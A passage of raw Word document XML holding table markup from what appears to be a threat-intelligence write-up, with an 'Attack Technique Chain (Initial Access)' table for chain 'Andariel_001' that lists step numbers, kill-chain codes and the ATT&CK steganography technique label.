                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4D18" w:rsidRPr="00B857D7" w14:paraId="103423FE" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="636FCF3E" w14:textId="77777777" w:rsidR="00CF4D18" w:rsidRDefault="00CF4D18" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="536E5B68" w14:textId="34D8A7A5" w:rsidR="00CF4D18" w:rsidRDefault="00CF4D18" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="000324F6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB59579" w14:textId="77777777" w:rsidR="00CF4D18" w:rsidRDefault="00CF4D18" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="37"/>
      <w:tr w:rsidR="00A16DF2" w:rsidRPr="00B857D7" w14:paraId="12C61999" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F008CB7" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43231462" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33D1CD84" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00385F72">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54D0B17C" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00AC7A85" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2"/>
    <w:p w14:paraId="6535D702" w14:textId="495C417E" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc110935505"/>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="3589A802" w14:textId="77777777" w:rsidR="00223DC5" w:rsidRPr="00223DC5" w:rsidRDefault="00223DC5" w:rsidP="00223DC5"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9776" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="710"/>
        <w:gridCol w:w="1744"/>
        <w:gridCol w:w="2148"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="647"/>
        <w:gridCol w:w="559"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2341"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="7F81F45C" w14:textId="77777777" w:rsidTr="008035DA">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0F18CB3A" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="39" w:name="OLE_LINK24"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29124084" w14:textId="75B3D5AA" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3C41C133" w14:textId="202C832E" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Andariel_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4F0F2498" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="351335FF" w14:textId="45A0811A" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="47921EF7" w14:textId="39858F66" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="419D92AD" w14:textId="08873F40" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5510C5D2" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="002D1D50" w14:paraId="18B5930A" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D3B03F" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37885CEA" w14:textId="472851B7" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056161A4" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C53C032" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E787C2A" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="498BBDDB" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03EB81E3" w14:textId="4E55B84A" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE28281" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="002D1D50" w14:paraId="3DFA365D" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C139E69" w14:textId="2140A750" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D865652" w14:textId="0BC7D3C3" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05AA6587" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35BFDE63" w14:textId="057AA812" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F914245" w14:textId="0E97C345" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BBA03A" w14:textId="34460332" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7505A86F" w14:textId="38FA41D0" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751B9398" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="002D1D50" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="00B857D7" w14:paraId="7270CA70" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C31AD70" w14:textId="485F61AF" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43046946" w14:textId="7D87C230" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">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148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B4773F4" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217175B6" w14:textId="51B2840E" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="009031E8" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4241A3A4" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714C39EC" w14:textId="43133752" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F382319" w14:textId="670D1BB2" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A72630" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008035DA" w:rsidRPr="00B857D7" w14:paraId="037B290D" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="544B976C" w14:textId="46AEA2F8" w:rsidR="002B6133" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72FCFB00" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="002B6133" w:rsidP="002E403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148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3616FF" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1027.003 </w:t>
            </w:r>
            <w:r w:rsidRPr="00461F9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>&lt;Obfuscated Files or Information</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00461F9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00461F9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00461F9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Steganography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C1D3956" w14:textId="26D8C186" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="008312C5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
